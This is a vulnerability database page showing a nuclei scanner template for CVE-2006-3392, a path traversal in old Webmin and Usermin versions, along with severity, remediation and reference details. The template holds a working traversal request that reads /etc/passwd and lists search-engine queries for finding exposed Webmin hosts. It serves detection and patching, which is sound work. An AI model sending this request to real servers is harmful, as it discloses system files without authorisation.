Lucene search
K

Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure

🗓️ 26 Jun 2026 18:13:08Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Webmin before 1.290 and Usermin before 1.220 expose arbitrary files with path traversal ..%01.

Related
Refs
Code
id: CVE-2006-3392

info:
  name: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
  author: s4e-io
  severity: medium
  description: |
    Webmin before 1.290 and Usermin before 1.220 contain a path traversal caused by calling the simplify_path function before decoding HTML, letting remote attackers read arbitrary files, exploit requires sending crafted '..%01' sequences.
  impact: |
    Attackers can read arbitrary files on the server, potentially exposing sensitive information.
  remediation: |
    Update to Webmin 1.290 and Usermin 1.220 or later versions.
  reference:
    - https://www.exploit-db.com/exploits/1997
    - https://www.exploit-db.com/exploits/2017
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5.0
    cve-id: CVE-2006-3392
    epss-score: 0.77805
    epss-percentile: 0.99512
    cwe-id: CWE-22
  metadata:
    max-request: 1
    vendor: webmin
    product: webmin
    shodan-query: http.title:"webmin"
    fofa-query: title="webmin"
    google-query: intitle:"webmin"
  tags: cve,cve2006,webmin,usermin,lfi,traversal,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200ed84f9009e6e1385bfbe5b84a60f6519fa97394491f09f1668dfdf8a745fd07022100b09795f11de8eda0b6c2630af501e2aed1e70bb4f58e7374d0ffda55c5ca431d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 25
EPSS0.77805
29